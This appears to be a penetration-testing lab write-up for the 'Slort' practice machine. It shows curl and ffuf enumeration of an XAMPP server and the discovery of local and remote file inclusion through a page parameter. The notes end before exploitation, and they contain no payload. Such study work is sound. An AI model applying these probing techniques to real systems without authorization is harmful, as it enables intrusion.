Web
Nmap discovered a Web server on the target port 8080
The running service is Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -i http://$IP:8080/
HTTP/1.1 302 Found
Date: Fri, 07 Feb 2025 18:34:34 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Location: http://192.168.134.53:8080/dashboard/
Content-Length: 0
Content-Type: text/html; charset=UTF-8302 to http://192.168.134.53:8080/dashboard/
/Practice/Slort/2-Enumeration/attachments/{A0C1FAB0-8BDE-44EC-9660-4C5B2194B9E7}.png)
It’s the default installation of XAMPP Apache
The web server appears identical to the web server on the target port 4443
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP:8080/FUZZ -ic
________________________________________________
:: Method : GET
:: URL : http://192.168.134.53:8080/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htpasswd [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 372ms]
.htaccess [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 791ms]
aux [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 33ms]
cgi-bin/ [Status: 403, Size: 1060, Words: 103, Lines: 43, Duration: 40ms]
com1 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 29ms]
com4 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 27ms]
com3 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 46ms]
com2 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 55ms]
con [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 81ms]
dashboard [Status: 301, Size: 351, Words: 22, Lines: 10, Duration: 27ms]
favicon.ico [Status: 200, Size: 30894, Words: 412, Lines: 6, Duration: 24ms]
img [Status: 301, Size: 345, Words: 22, Lines: 10, Duration: 22ms]
licenses [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 100ms]
lpt2 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 36ms]
lpt1 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 45ms]
nul [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 51ms]
phpmyadmin [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 72ms]
prn [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 44ms]
server-info [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 22ms]
server-status [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 30ms]
site [Status: 301, Size: 346, Words: 22, Lines: 10, Duration: 22ms]
webalizer [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 49ms]
xampp [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 22ms]
:: Progress: [20478/20478] :: Job [1/1] :: 588 req/sec :: Duration: [0:00:54] :: Errors: 0 ::/site/
/site/
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -I http://$IP:8080/site/
HTTP/1.1 301 Moved Permanently
Date: Fri, 07 Feb 2025 21:27:40 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Location: index.php?page=main.php
Content-Type: text/html; charset=UTF-8/Practice/Slort/2-Enumeration/attachments/{1474A4DB-A34B-4A48-8A81-C7C935D22A07}.png)
301 to the /site/index.php?page=main.php
/Practice/Slort/2-Enumeration/attachments/{FE1EA61A-7A39-465D-8702-33E67C4748B0}.png)
There appears to be an inclusion at the page parameter of the index.php file
LFI
/Practice/Slort/2-Enumeration/attachments/{21299A9A-18C1-4A31-B631-D7B21FF030EE}.png)
LFI confirmed
RFI
/Practice/Slort/2-Enumeration/attachments/{8E2B80DA-FE62-4DA7-B549-5EB0EEC703C1}-1.png)
/Practice/Slort/2-Enumeration/attachments/Pasted-image-20250207225638.png)
RFI confirmed
Moving on to the Exploitation phase